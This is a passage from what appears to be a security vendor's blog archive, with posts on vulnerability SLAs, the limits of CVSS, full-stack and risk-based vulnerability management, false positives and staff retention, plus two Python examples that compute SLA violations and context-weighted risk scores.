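    blank input returns None. Malformed or repeated units are rejected rather
    than silently ignored, so a typo cannot produce a wrong deadline."""
    tokens = text.split()
    if not tokens:
        return None
    total, seen = 0, set()
    for token in tokens:
        m = _TOKEN.match(token)
        if m is None:
            raise ValueError(f"bad SLA token: {token!r}")
        qty, unit = int(m.group(1)), m.group(2)
        if unit in seen:
            raise ValueError(f"unit {unit!r} given twice")
        seen.add(unit)
        total += qty * _UNIT_SECONDS[unit]
    return timedelta(seconds=total)


def sla_deadline(opened: datetime, sla: Optional[timedelta]) -> Optional[datetime]:
    """The date shown on the vulnerability page: when an open finding violates its SLA."""
    return None if sla is None else opened + sla


def sla_violations(vulns, sla_by_risk: dict, now: datetime) -> list:
    """Ids of open vulnerabilities whose deadline has already passed.

    vulns: dicts with id, risk, opened (aware datetime), closed (aware datetime or None)
    sla_by_risk: {risk_level: timedelta or None}; levels without an SLA never violate."""
    violating = []
    for v in vulns:
        if v["closed"] is not None:          # remediated findings are out of scope
            continue
        deadline = sla_deadline(v["opened"], sla_by_risk.get(v["risk"]))
        if deadline is not None and now > deadline:
            violating.append(v["id"])
    return violating


# Constructed configuration: one SLA per risk level, two levels without one.
SLA_BY_RISK = {
    5: parse_sla("1d 20h 40m"),
    4: parse_sla("7d"),
    3: parse_sla("30d"),
    2: parse_sla(""),     # cleared form -> no SLA
    1: None,
}
NOW = datetime(2022, 11, 1, 12, 0, tzinfo=timezone.utc)
VULNS = [  # constructed records
    {"id": "v1", "risk": 5, "opened": NOW - timedelta(days=2), "closed": None},
    {"id": "v2", "risk": 5, "opened": NOW - timedelta(hours=20), "closed": None},
    {"id": "v3", "risk": 4, "opened": NOW - timedelta(days=10), "closed": NOW - timedelta(days=1)},
    {"id": "v4", "risk": 3, "opened": NOW - timedelta(days=31), "closed": None},
    {"id": "v5", "risk": 2, "opened": NOW - timedelta(days=400), "closed": None},
]

if __name__ == "__main__":
    print("violating:", sla_violations(VULNS, SLA_BY_RISK, NOW))
```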
SLAs allow teams to make visible and transparent commitments to their organization in relation to vulnerability remediation.

Learn more about Edgescan and how it can help your organization.

Streamline Response Times with ASM

Our new SLA feature is designed to enhance your response times for critical vulnerabilities. With Attack Surface Management (ASM), we help you identify, monitor, and secure your external digital assets. Whether you’re in Dublin or New York, we make sure your business stays ahead of potential threats.

### Edgescan Company Day & Awards

Last Friday, Edgescan had its first full company day in more than three years! It was awesome to be able to hang out together at Dunboyne Castle, and a large number of us had never met in person! ‘Awaydays’, as we call them, have been a frequent part of company life since we started, usually a few each year, whereby we all come together for the full day and night. Since the last one in March 2019, we have doubled in size and grown our US team substantially. It was lovely to be able to welcome them all, and for many it was their first time in Ireland!

Not only did we have a very constructive day of brainstorming and catching up, but we also had our Edgescan awards, the two main ones being:

- Best Sales Rep of the Year
- Conor Cronin Award – for security operational excellence

We also had a few other awards; however, these were for individual projects internally (it had to do with a Hackathon and pirates – don’t ask!) and client-specific projects (such as a project delivering a large number of pen tests in a very short timeframe).

The first award was for best sales representative this year, and the winner was Rodney Jess.

Our next award was the Conor Cronin award, dedicated to the late Conor, who worked at Edgescan as a penetration tester. This year we were delighted to present this award to one of our team leads, Patrick Christian.
Patrick was nominated and voted for by team members – one of the unsung heroes working tirelessly in the background. Congrats Patrick, well deserved!

We are already looking forward to our next big meet-up (most likely the Christmas party, whoop whoop) and to seeing how our family has once again grown.

### Why CVSS Just Isn’t Enough

Pandemic Causes Enterprises to Pivot from Common Vulnerability Scoring System (CVSS)

When COVID-19 shook up the world in 2020, in-person buying opportunities evaporated. If “non-essential” organizations were going to sell or provide services, they would need to do so digitally. Across the world, companies that were forced into rapidly expanding their online presence soon found that CVSS wasn’t enough to adequately address the corresponding increase in vulnerabilities.

“As lockdowns became the new normal, businesses and consumers ‘went digital’, providing and purchasing more goods and services online, raising e-commerce’s share of global retail trade from 14% in 2019 to about 17% in 2020.” (COVID-19 and e-commerce: a global review, UNCTAD 2021)

“Either it should be made clear that CVSS reflects severity, not risk, or CVSS must be adjusted to make it reflect risk so users of CVSS can make more informed decisions.” (Towards Improving CVSS, Carnegie Mellon, 2021)

Rapid Online Expansion Creates a Hacker’s Paradise

Attack surfaces rapidly expanded before InfoSec teams could implement new processes to keep their cyber-stack secure. Organizations scrambled to increase their online presence, but budgets had already been established for the year. It wasn’t until the following year, when world governments made a push to strengthen cybersecurity processes, that more funds could be allocated.

Pre-Allocated Budget Meant the Vulnerability Management Program Could Not Adapt

With capped annual Vulnerability Management security budgets, many cyber teams got tied to dated and unscalable processes. Expanded APIs, larger attack surfaces, and new vulnerabilities compounded the issue. What emerged was a fundamentally new problem facing the Enterprise’s Vulnerability Management Program.

Answering the Basic Question: Does it Matter?

The question that Cyber FTEs need to answer is simple: what is critical to my organization? Organizations need to know what a given vulnerability means for their organization specifically. The tool typically used to answer this question is CVSS standard scoring. Even post-pandemic, many teams across the globe continue to rely on CVSS scoring alone, and therein lies the problem. They’re still not getting an accurate depiction of what is happening in their cyber-stack.

CVSS is Not Enough for an Effective Vulnerability Management Program

Before the creation of CVSS, vendors across the globe used various systems for critical vulnerability management metrics. However, it was almost impossible to find a correlation between the different platforms used. CVSS was created to solve this problem by establishing a standard severity presumption across organizations that could be tracked uniformly. CVSS scoring is a fantastic tool for assessing generic, non-specific base, temporal and environmental metrics of vulnerability severity.

CVSS’s Fundamental Problem: It’s a Static Scoring System

Organizations need more than a snapshot of their risk posture. Without context, there’s no sure way to understand the specific impact of vulnerabilities. For example, unpatched vulnerabilities with a CVSS score of 4.0 or higher generally have an unfavourable impact on PCI compliance. However, that same vulnerability won’t pose nearly the same risk to a healthcare organization navigating HIPAA compliance regulations.

So what is the solution? The answer is risk-based data. Organizations need to know how a vulnerability will affect their particular organization if it’s not remediated or patched promptly. Risk-based data provides context and narrative surrounding vulnerabilities when based on the intricacies of the organization. Organizational context is a defining factor in:

- determining what a vulnerability truly means to a company;
- allowing for effective prioritization and an optimized workflow for Cyber FTEs;
- ensuring that organizations are focused on what matters.

Taking the First Step Away from CVSS

Accurate risk-based data informing the Vulnerability Management Program is the first step to securing an organization’s cyber-stack. As Gartner puts it, “Security and risk leaders should tie vulnerability management practices to their organization’s specific needs, not a mythical standard.” (Gartner, How to Set Practical Time Frames to Remedy Security Vulnerabilities, June 23, 2021)

Context is King

CVSS is great at what it does (and solves the problem that it was intended to fix). However, on its own it does not provide the reliable risk-based data that an optimized Vulnerability Management Program needs. Get the most accurate depiction of what is happening within your cyber stack. Find a tool and/or vendor that gives you actionable risk-based data. Ensure that your data alerts provide context, narrative, and a story behind the vulnerabilities that come across your desk. Good hunting, ladies and gentlemen.

Learn more about leveraging risk-based intelligence for your Vulnerability Management Program.

### Transforming the Vulnerability Management Function

How can one achieve the necessary level of insight to be informed on what really matters? Gartner highlights the need for executives to become more agile in their vulnerability management approach and notes the trend to transition away from a centralized function toward a distributed, informed risk decision-making model.
#### Transitioning from Technical Security to Executive Risk Management

“The CISO role has moved from a technical subject matter expert to that of an executive risk manager” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022)

“Enterprise cybersecurity needs and expectations are maturing, and executives require more agile security amidst an expanding attack surface. Thus, the scope, scale, and complexity of digital business makes it necessary to distribute cybersecurity decisions, responsibility, and accountability across the organization units and away from a centralized function.” (Gartner 2022)

#### Distributing Decisions - One of the Top Five Security Trends for 2022

“By 2025, a single, centralized cybersecurity function will not be agile enough to meet the needs of digital organizations. CISOs must re-conceptualize their responsibility matrix to empower Boards of Directors, CEOs, and other business leaders to make their own informed risk decisions.” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022)

#### Enabling Smart Vulnerability Management Decisions – Five Important Steps

Here are five important steps to enable your Enterprise Vulnerability Management office to become an informed executive risk decision maker.

#### 1 - Eliminate the Noise

Automated scanners across the full stack generate a significant number of false positives. This noise clouds the actual relevant data needed to make informed decisions. Keep your security staff focused on what matters. Instead of having them manually remove false positives, utilize a Hybrid Vulnerability Management Platform with enterprise security experts in that role.

#### 2 - Get a Single Picture of What Matters

Your business leadership audience does not need (or want) a separate vulnerability assessment on each layer of the attack surface. They want a singular, composite view of what vulnerabilities can have an impact on their business.
To be informed and decisive, they need the message to be simple and clear. Consider a Vulnerability Management Platform that: a) integrates alerts from all the layers of the full stack (from networking to web applications) and b) provides intelligence on the entire evolving attack surface including the challenging APIs.

#### 3 - Rank Business Risk Alerts

The limitations of CVSS are well known and well documented. Ideally, your Smart Vulnerability Management Platform should business-rank each vulnerability alert within the context of your organization. Smart risk management triages severe, high-impact vulnerabilities over high-volume, low-risk alerts.

#### 4 - Verify with Integrated Pen Testing

Traditional penetration testing is typically scheduled on the calendar for a finite number of times per year. But to make truly informed risk-based decisions, real vulnerabilities and their fixes need to be validated as they occur. An integrated on-demand pen testing service facilitates issue detection, remediation, and validation – all in one seamless efficient vulnerability management process.

#### 5 - Integrate Risk Communication into Your Audience Systems

Your Vulnerability Management Platform may currently give you a single dashboard of Vulnerability Business Risk Exposure. But is it accessible to your business decision makers and IT support team? Real-time integration into your risk management and ticketing systems enables them to make daily quick and conclusive decisions. Fortunately, leading Vulnerability Management Platforms now come pre-baked with integration into most major Enterprise IT and Risk systems. This is not a “nice to have” convenience feature. It is essential to positively impact remediation times. Only a day-to-day workflow integration can provide actionable visibility to your IT operations staff and business leadership team.
#### Smart Vulnerability Management Enables Informed Risk Management Decisions

Informed risk managers use a single touchstone of prioritized high-risk alerts free of false positives across the entire attack surface. Ideally, this touchstone is integrated into the daily workflow of Security, Business Leadership, and IT functions. While Gartner predicts that most Enterprises will pivot to this model by 2025, it is imperative that leaders in this most relevant field do not fall behind. Taking these five steps to enable informed risk management decisions should be a priority in 2022.

Learn Why Smart Vulnerability Management Matters by downloading our whitepaper.

### Keeping Your Wizards: Onboarding and Retaining Cybersecurity Staff

How do we keep our Wizards? I’m not referring to the spell-casting, long-bearded, dungeons and dragons characters. I’m referring to those invaluable cybersecurity staff members in your Security Operations Center (SOC) who handle your most critical responsibilities and tasks. These are the heroes that make an impact within your organization by managing crucial remediations, code changes, or risk analysis. You can't afford to lose these InfoSec superstars. If your wizards disappear, so does their institutional knowledge. That's an immediate, painful, and potentially disruptive void to refill.

#### Cybersecurity Staffing: A Real Business Concern

Consider these findings made in 2022:

“About one million people work in cybersecurity in the U.S., but there are nearly 600,000 unfilled positions.” The Philadelphia Inquirer (2022)

And the situation is not getting better...

“In the last 12 months, job openings have increased 29%, more than double the rate of growth between 2018 and 2019.” Gartner TalentNeuron (2022)

But the most telling metric is how the staffing shortage impacts actual security vulnerabilities.
According to a recent Forbes report (April 22, 2022): “Continued Security Staff shortages are making businesses more vulnerable to cyberattacks...Talent shortages have a tangible impact on security programs. As colleagues leave and roles stay open, they are struggling to maintain security standards, particularly around compliance and supporting secure development. Vulnerabilities are more likely to slip past undetected, and teams are concerned they’re not ready to respond to cyberattacks.”

#### The InfoSec Labor Market is Tighter Than Ever

Cybersecurity professionals with vetted, practical expertise are in high demand. While online certifications have become extremely popular, CISOs and InfoSec VPs are mostly competing for workers with real hands-on experience. Employers are becoming more aggressive in their efforts to poach skilled cybersecurity workers from other organizations and competitors. So how can you ensure that your wizards – in which you've invested serious time and money – stay with you?

#### Keep Your Cybersecurity Staff Engaged

Employee fulfillment is essential for retention. “Employee engagement is an investment we make for the privilege of staying in business,” states Ian Hutchinson, Life & Work Engagement Strategist. We’ve all heard stories of wizards running for greener pastures after they felt like they were being underutilized or under-appreciated. I’m sure many of us have felt the same way in our past (or even current) job positions. For Security Wizards, the most complex, crucial, and challenging work is often the most fulfilling. Make sure that your employees are doing what they were hired to do instead of “donkey work” (as Michael Douglas would put it).

#### Cybersecurity Staff Pain Points: A Problem-Solving Example

Your wizards are spending an inordinate amount of time validating reports and sifting through thousands of results. They're feeling throttled instead of feeling the magic.
The CISO removes these relatively menial tasks and optimizes workflows to ensure that team members are doing the job they signed up for. Now the wizards can spend their precious time on the critical tasks that excite them to effect real and significant change. With this strategy, you've just improved your risk posture in tandem with employee morale. You've also made it easier for your organization to attract and recruit new wizards.

#### Bonus Impact on the Rest of the Cybersecurity Team

Your wizards will feel more fulfilled and also have the bandwidth to teach the rest of your security staff members. Do other employees in your cybersecurity workforce demonstrate the potential to become a sorcerer themselves? Now wizards can help those rising stars shine! Let your wizards do what they do best to help strengthen your employees' core happiness, progression, and retention. Worst-case scenario? If a wizard vanishes, you'll still have some up-and-coming apprentices who are ready to practice their own cybersecurity magic.

#### Protect Your Prized Assets

Keep your wizards! How can you create the Ideal Security War Room, and also keep your wizards? Learn about Building the Ideal War Room by downloading our free whitepaper.

### RSAC 2023

UPCOMING: 24-27 April 2023 | San Francisco

CONFERENCE THEME: Stronger Together

In the cybersecurity industry, no one goes it alone. Instead, we build on each other’s diverse knowledge to create the next breakthrough—exchanging ideas, sharing our success stories, and bravely examining our failures.

One-on-One Sessions will be available to provide:

- A dedicated session with an Edgescan Solution Professional
- Answers to any questions about needs within your particular environment
- Updates on the latest developments of the Edgescan Platform
- An exclusive gift from Edgescan to take home

#### How to Book a Session

We will make a calendar available soon for you to arrange a one-on-one session with your dedicated Edgescan Solution Professional.
Exhibit Location: TBD

#### Have a Question?

Contact our team to learn more about the Edgescan Platform.

Edgescan will be attending RSAC 2023, which is themed 'Stronger Together'.

### Blackhat USA

PAST EVENT: 10-11 Aug 2022 | Las Vegas, NV

One-on-One Sessions provided:

- A dedicated session with an Edgescan Solution Professional
- Answers to any questions about needs within your particular environment
- Updates on the latest developments of the Edgescan Platform
- An exclusive gift from Edgescan to take home

### The Smart Vulnerability Management Checklist – Six Important Approaches You Need to Adopt Today

If you are considering adopting a “Smart” approach to your Vulnerability Management (VM) Program, we have put together a list of six top-of-mind items you need to consider before you go “Smart”:

#### Number 1 - Continuous Attack Surface Management (ASM) and API Discovery

As new systems are deployed or decommissioned, existing systems change, and APIs are left unmanaged, new avenues of attack surface are introduced. You cannot protect what you cannot see. The good news is that there are Smart ASM and API Discovery solutions to provide full visibility coverage continuously. If your attack surface is ever-evolving, then your ASM and API Discovery approach must be continuous also.

#### Number 2 - Integrated Penetration Testing

Automation can only get you so far. In general, automation and scanning tools do not detect certain issues including business logic and complex data-driven vulnerabilities. That’s where integrated Penetration Testing comes in. To verify and determine that all vulnerabilities have been effectively closed, it is necessary to manually attempt to break the business logic of the application. This needs to be performed by experts whose technical expertise and enterprise business logic knowledge can truly get to the bottom of what the automated scanning tools have surfaced and provide in-depth analysis and verifiable conclusions on every possible exposure.
Traditional calendar-scheduled penetration testing will not suffice – it must be in concert with your automated Vulnerability Management scanning solution.

#### Number 3 - Integrated Full Stack Approach

Vulnerability Management (VM) with blind spots is not smart. Smart VM assesses vulnerability across the entire stack from the network to the application layer. Just as the hackers themselves welcome any weakness in any layer – they are quite accommodating in this respect – so too should the Smart VM solution address any issue regardless of the layer location. Even if you manually attempted to tie insights from each tool dedicated to each layer, there are correlations of incident detection between layers that you may miss. These correlations are precisely what an integrated full stack solution would detect.

#### Number 4 - Contextualized Alerts

Traditional automated scanning solutions will provide incident alerts. They will provide a lot of them. But without knowing their context – what order of priority both on the business and technical side they should be placed in – it is challenging to determine how one should respond and with what urgency. And chasing every incident as if it has a Level 1 Risk Association tied to it is simply not sustainable. A Smart VM solution is designed so that in the onboarding phase, vulnerabilities can be classified to reflect both the technical and business risk they represent.

#### Number 5 - Smart Remediation Integration

The Smartest of Vulnerability Management (VM) solutions will be effectively rendered useless if the insight and remediation guidance are not integrated into the daily operational support systems and workflow. The challenge is that typical Enterprise systems - risk, software development, and ticketing systems - were not built to capture output from a Vulnerability Management solution.
By creating an integrated workflow so that prioritized alerts and guidance are placed in the hands of the IT Support teams on their system of choice, remediation times can be drastically reduced.

#### Number 6 - Human Security Expertise

To determine the meaning of each incident and what it truly represents in terms of real risk to the business, it takes a human – a skilled security expert – to make that assessment. We call the overlay of human security expertise on top of the automated scanning tools a hybrid approach. And it is smart in many ways. One of the most important benefits is simply taking out the noise – the false positives. The automated scanning tools enable the Vulnerability Management Program to scale, and the human dimension enables depth and accuracy.

#### Deeper Dive

If you would like to learn more about the value of Smart Vulnerability Management approaches, click here to download your free White Paper:

### Nine Considerations to Orchestrate the Perfect Vulnerability Management (VM) War Room

Of course every Global 3000 Enterprise wants a Vulnerability Management (VM) solution applied to the full stack. Orchestrating this effort requires you to take important considerations into account. Here are nine of them.

The typical Global 3000 Enterprise now has several years under its belt leveraging automated scanning tools for each layer of the attack surface. However, orchestrating the integration of all the data fed from the evolving attack surface and the vulnerabilities from each IT layer is not straightforward. The good news is that the Vulnerability Management (VM) industry is now pivoting to full-stack solutions to make this orchestration much more efficient. Here are some top-of-mind considerations for both your organization and your new full-stack supplier you should include in your orchestration effort:

- Full Stack Tuning – Scanners must be tuned for each layer – from Web Applications to Networks to APIs.
- Human Intelligence Integration – To achieve both scale and depth, the scale of tuned automation scanning needs to be balanced with the depth of expert human interpretation and false-positive removal.
- Continuity – The assessments themselves must be continuous. Batched assessments spread out across the calendar year leave temporal gaps for would-be attackers.
- ASM and VM Convergence – The continuous scanning for vulnerabilities and attack surface component identification must be integrated. One cannot protect what one cannot see.
- Alert Unification – The reporting system needs to generate alerts for both security alerts and business-ranked intelligence across every layer into one unified interface.
- Administrative Layer – Ensure your VM supplier provides a separate instance of cloud control connected to your dedicated virtual machine. It’s your solution – you should be able to self-administrate.
- Client Privacy – You need to be able to control access attributes for your privacy needs so you can control what your VM supplier sees.
- Dedicated Tunnel – You should be provided with a dedicated tunnel from the supplier’s hosted platform that serves your specific scanning validation and assessment data.
- Operational Integration – Ensure that your supplier’s VM solution connects using APIs to your required IT Service Management and Dev Ops systems. Relevant contextualized and verified alerts should be integrated and automated into your daily workflow to ensure optimum remediation times.

If you would like to learn more about how to optimize your Vulnerability Management efforts, click below to learn more.

### Putting Your Full Stack Vulnerability Management Solution into Action – Three Practical Suggestions

With power comes responsibility. Leverage all the value of your new Single Full Stack Vulnerability Management Platform with these three tips.
#### So Many Compelling Reasons to go Full Stack with Your Vulnerability Management Program

You finally have decided to take the plunge. There are so many good reasons to go full-stack. Let’s remind ourselves of some of the important ones:

- Tool Proliferation – You are not alone. Gartner has told us that Enterprises on average have 16 tools in the Vulnerability Management Portfolio and 12% have 46 or more! (Gartner’s Top Security and Risk Trends for 2021)
- Consolidated View of Risk – The most obvious benefit: if you consolidate the full stack then your single unified dashboard will provide you with a consolidated picture of your risk.
- Lower Overhead and Lower Costs – Licensing costs are typically significantly lower for one solution and the overhead to support separate tools is dramatically reduced.
- Operational Efficiency – With one solution there will be only one system generating tickets across the entire stack. This means only one place with consistent reporting to source alerts without a Business Intelligence tool and far easier integration to your own IT support system.
- Resilience – While Cost Reduction might initially be the driver, the same Gartner Report concludes that consolidation delivers lower risk.

#### Three Practical Suggestions

Here are three top-of-mind items you should be considering when you first adopt a full-stack solution:

#### Number 1 - Be Smart About Pilots

Do not cherry-pick one layer from a Single Full Stack Solution Vendor – that misses the point. Instead, pilot with a singular, full-stack solution that incorporates several layers. If you are concerned about over-investing in a solution in the pilot phase, then perhaps scope the pilot within only one business division or one geography to validate a single multi-layered experience.

#### Bonus List – The Layers You Should Consider

In the context of Vulnerability Management – what exactly constitutes a “full-stack”?
- Web application layer (including APIs, Website, and Mobile)
- Hosting Environment layer (Web Application Server)
- Operating System of the Host
- Host Machine Services (Network Protocols, Services and Ports)
- Underlying Network (Associated Devices including IoT, Firewalls, Routers)

#### Number 2 - Leverage Your New Enlightened View of Risk

Risk is not linear – how one communicates risk is traditionally challenging. One thousand issues with a score of 1 (on a scale of one to one hundred) yields a risk score of 1000 as opposed to one issue ranked at 98. But it’s that one 98-ranked issue that could present a significant issue for your business. With your new composite view of risk, you can build your platform to alert you on, say, a considerable business concern like the 98-score vulnerability. Basically, with a full-stack single solution, you can build weighted alerts, regardless of the layer location, to signal what matters the most. And that’s the whole point of the approach – to gain that holistic view.

#### Number 3 - Correlations are Key

Remember, you now have a prepackaged singular solution. No more manual attempts at linking vulnerability source data from layer to layer. So, things like correlating a network issue with web application issues are now easily attainable. It’s much more intuitive with a combined view of risk against the entire full-stack. Indeed, your composite correlation-detecting viewpoint puts you on a level playing field (if not a superior position) to your attacker.

If you would like to learn more about Full Stack Vulnerability Solutions, click below to download your free white paper.

#### Full-Stack Security with NVM

At Edgescan, we know full-stack security is essential. Our Network Vulnerability Management (NVM) provides comprehensive coverage for your entire technology stack, ensuring continuous monitoring and remediation. From Dublin to New York, we deliver solutions that protect your organization at every layer.
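The context-weighted, non-additive prioritisation argued for here and in the CVSS discussion earlier on this page, as an added Python example that is not Edgescan's code or scoring model: the weights, asset names and findings are hypothetical, and the PCI floor models the earlier point that a CVSS 4.0+ issue carries compliance weight for a PCI-scoped asset that it need not carry for a HIPAA-scoped one.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    """One scanner finding, carrying only the static CVSS base score."""
    fid: str
    asset: str                  # asset the finding was raised against
    layer: str                  # "web", "api", "host" or "network"
    cvss: float                 # CVSS base score, 0.0 - 10.0
    exploit_known: bool = False  # e.g. listed in a KEV-style feed


@dataclass(frozen=True)
class AssetContext:
    """Organisation-specific facts that a scanner cannot know on its own."""
    criticality: float           # 0.25 (lab box) .. 1.0 (revenue-critical)
    internet_facing: bool
    compliance_scope: frozenset  # e.g. frozenset({"PCI"})


# Hypothetical weights chosen to illustrate the idea; not an industry standard.
INTERNAL_ONLY_FACTOR = 0.6      # not reachable from the internet
NO_KNOWN_EXPLOIT_FACTOR = 0.8   # nobody is known to be exploiting it yet
PCI_FLOOR = 40.0                # CVSS >= 4.0 in PCI scope is a compliance failure


def contextual_score(f: Finding, ctx: AssetContext) -> float:
    """Translate a static CVSS score into a 0-100 score for *this* organisation."""
    score = f.cvss * 10.0 * ctx.criticality
    if not ctx.internet_facing:
        score *= INTERNAL_ONLY_FACTOR
    if not f.exploit_known:
        score *= NO_KNOWN_EXPLOIT_FACTOR
    # Regulatory floor: a CVSS 4.0+ issue on a PCI asset is never "low" for a
    # card-processing business, whatever the purely technical arithmetic says.
    if "PCI" in ctx.compliance_scope and f.cvss >= 4.0:
        score = max(score, PCI_FLOOR)
    return round(min(score, 100.0), 1)


def prioritise(findings, contexts):
    """Rank findings from every layer by contextual score, highest first."""
    scored = [(f, contextual_score(f, contexts[f.asset])) for f in findings]
    return sorted(scored, key=lambda fs: fs[1], reverse=True)


def portfolio_risk(scored) -> float:
    """Risk is not additive: the worst single issue defines the exposure."""
    return max((s for _, s in scored), default=0.0)


def naive_sum(scored) -> float:
    """The misleading alternative: summing scores lets volume drown severity."""
    return sum(s for _, s in scored)


def alerts_above(scored, threshold: float = 90.0):
    """Weighted alert rule: page the team only for what actually matters."""
    return [f.fid for f, s in scored if s >= threshold]


# Constructed sample data (hypothetical assets and findings).
CONTEXTS = {
    "payments-api": AssetContext(1.0, True, frozenset({"PCI"})),
    "hr-intranet": AssetContext(0.6, False, frozenset({"HIPAA"})),
    "lab-host": AssetContext(0.25, False, frozenset()),
}

FINDINGS = [
    Finding("F-1", "payments-api", "api", 9.8, exploit_known=True),
    Finding("F-2", "payments-api", "web", 4.3),   # same CVSS as F-4 ...
    Finding("F-3", "hr-intranet", "web", 9.8),
    Finding("F-4", "hr-intranet", "host", 4.3),   # ... different business context
] + [
    # one thousand trivial CVSS 1.0 findings on a lab box: the "1000 x 1" case
    Finding(f"LAB-{i}", "lab-host", "network", 1.0) for i in range(1000)
]


def demo():
    scored = prioritise(FINDINGS, CONTEXTS)
    for f, s in scored[:4]:
        print(f"{f.fid:5} {f.layer:8} {f.asset:13} cvss={f.cvss:<4} contextual={s}")
    print("naive sum     :", round(naive_sum(scored), 1))   # volume-dominated
    print("portfolio risk:", portfolio_risk(scored))        # the 98 wins
    print("alerts        :", alerts_above(scored))
    return scored


if __name__ == "__main__":
    demo()
```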
### Are False Positives Really a “Thing” in 2022 for Vulnerability Management Programs?

One would be tempted to think that after a decade of refinement of automated scanning tools across the full stack, false positives, and the time-intensive process of validating them, are a thing of the past. Exactly the opposite is true.

#### Will Scanning Automation Deliver Vulnerability Management Nirvana?

If there has been one theme to define the last decade of Vulnerability Management – it is the rise of automated scanning tools. The rise has been designed to deal with the ever-increasing number of attack surfaces and the frequency and ingenuity of the attacks themselves. In turn, the tools became more refined, more accurate, and expanded in scope to handle all the layers of the attack surface including not only the network but the application layer itself. As these trends continue one might reasonably ask - Are we heading to a utopian state? Are we reaching a point where the technology and its ability to handle the sheer volume of incidents outguns the attackers? Can we count on automated scanners to filter out false positives?

#### The View from the Trenches Is Not Pretty – It Is Actually Noisy

The answer is a firm “No”. For those on the front line tasked with managing incidents, their day-to-day is not close to utopian. If it were to be described with one word, it would be Noise. Far from Vulnerability Management nirvana – the front-line staff leveraging automated scanning tools are now faced with a new herculean task. For all the scaling efficiencies automated tools delivered, they have effectively created a massive new problem. A significant amount of the alerts represent false positives (noise) – an alert that flags a vulnerability that does not exist. How, with the proliferation of automated alerts, do the tools separate the wheat from the chaff?

#### How Bad is the False-Positive Verification Problem?
While detection automation looks after the incident scale issue – it passes on a new scaling problem – dealing with the noise.

“More than 60% of security professionals estimate their security function spend over 3 hours per day validating false positives. Nearly 30% are spending over 6 hours on this task. Most agree that it is too much, and the time could be better utilized. For most, it is the part of their job they like least.” – Infosecurity Europe 2021

#### We Have a Focus Issue

“Nearly half of all cybersecurity alerts are false positives, and 75% of companies spend an equal amount of time, or more, on them than on actual attacks.” – Security Boulevard, 2021

Given the extent of false positives, Vulnerability Management teams must put in the time and resources to remove them. But when that typically takes as much time as dealing with actual attacks, the question naturally arises – Is there a more efficient way to manage them?

#### Is a Hybrid Solution the Answer?

In conclusion, false positives and the process of validating them are a bigger “thing” than ever. Fortunately, there are Smart Vulnerability Management solution providers that provide a hybrid approach where a full-stack scanning solution is integrated with a team of expert security validators. With this approach, the Enterprise Vulnerability Management team can act now knowing all alerts presented are real and focus on what matters – securing the attack surface.

To learn more about how Hybrid Solutions effectively deal with the False Positive validation process, click below to receive a free white paper.

### Driving Smart Vulnerability Management (VM) Intelligence with Context

Smart Vulnerability Management (VM) allows quick determination between critical, high, medium, and low risk. Context drives everything.

#### Context Matters

Traditional automated scanning solutions will provide incident alerts. They will provide a lot of them.
But without knowing their context – what order of priority both on the business and technical side they should be placed in – it is challenging to know how one should respond. And chasing every incident as if it has a Level 1 risk association tied to it is simply not sustainable.

#### Installing Smart Intelligence – It’s All About the Setup

An effective and smart vulnerability management (VM) solution can be built so that in the onboarding phase, vulnerabilities can be classified to reflect both the technical and business risk they represent. Instead of trying to determine potential risk without a Smart VM approach, the alerts with a Smart VM solution will present themselves in context so that significant incidents can be dealt with in a timely and relevant way. Conversely, incidents that do not represent significant risk can be handled according to the severity of risk they represent.

#### But Every Business is Different

Put simply, a Game Streaming company will have different concerns than a Financial Service company. The ability to offer a highly responsive game interaction user experience will not have the same high priority in a financial services context. It is specifically because of these different business contexts that Smart VM solutions are designed with a built-in capability to rank incident-type against the specific technical and business risk for that organization. And finally, a Smart VM solution will have built-in automation to provide security and attack surface alerts with contextualized business and technical priority rankings.

#### All Incidents are Not Created Equal

Web application Risk Density is typically vastly higher than that of non-web application assets. It is important that your Smart VM solution can provide you with an accurate assessment of the risk density of every threat. Smart VM means you can quickly determine between critical, high, medium, and low risk. Context drives everything.
#### Context in Action

The Edgescan team leverages the Edgescan Platform to extract data across industries and geographies and can identify risks across the entire stack. Your current solution should be able to provide this context on the fly for your organization.

Learn more about Edgescan's risk-based vulnerability management >>

### Ten Reasons Why a Full Stack Vulnerability Management Platform Matters

#### A Singular Full Stack Vulnerability Management (VM) Platform Yields a Plurality of Benefits

A major theme of Enterprise software platforms is one of simplification – the drive to one singular solution. But does a singular full-stack solution have merits in the context of a Vulnerability Management (VM) Program? Should the Enterprise Security team move from a point solution approach to a full-stack platform, including the network, web apps, external attack surface management (EASM), mobile devices, and APIs? We think they should and here are ten reasons why:

- Benefit #1 – Consolidated View of Risk – Consolidation of risk data across the stack delivers a consolidated view of risk so one can focus on what matters.
- Benefit #2 – Full Picture of All Assets – One cannot protect what one cannot see. A full-stack solution provides a complete picture of your evolving attack surface.
- Benefit #3 – Comprehensive Protection – If you have a full stack to protect, then you require a full-stack solution. The attacker does not care what layer they attack – they just want a window of opportunity anywhere in the stack.
- Benefit #4 – Efficiency – It’s quicker and requires less effort to validate each alert from a single full-stack platform and have a full picture of what matters. Attempting to upskill resources against each specialized tool and manually cobble verified results into a composite picture is less than optimal.
- Benefit #5 – Compliance – One needs a full-stack assessment. Compliance looks at risk regardless of where it is.
- Benefit #6 – Overhead – A point-solution approach introduces significant overhead including set-up time, specialized individual tool training, specialized tool support and updates, and multiple integration efforts. A full-stack singular solution reduces this overhead significantly.
- Benefit #7 – Resilience – A single, contained (pre-packaged) solution means that all the same data for the same service is validated in a single place. In contrast, multiple validation efforts across each point solution introduce more layers of potential errors. One validation effort across only one solution reduces error significantly. Accuracy drives resilience.
- Benefit #8 – Costs – Some large enterprises “manhandle” the integration problem to achieve a full-stack risk view – but many mid-sized organizations simply cannot afford that approach. And even for those that can – is that the wisest use of your security budget when single full-stack solutions are available? There will then be the ongoing support costs for a manual integration approach.
- Benefit #9 – Operational Headache – With layered point solutions, there will be multiple tickets with multiple vendors over one vulnerability, instead of a single solution that can port metadata over for a singular view of risk. And there is only one single point of contact for all alerts regardless of issue layer location.
- Benefit #10 – Strategic Alignment – The Enterprise management team simply wants to achieve desired business goals and wants to be able to effectively ensure that vulnerabilities that can have an impact on strategic goals are efficiently managed. One full-stack solution enables direct alignment between strategic business goals and the VM team’s focused efforts.
### Infosecurity Europe 2022

PAST EVENT: 21-23 June 2022 | London

One-on-One Sessions on each of the Infosec Europe event days provided:

- A dedicated session with an Edgescan Solution Professional
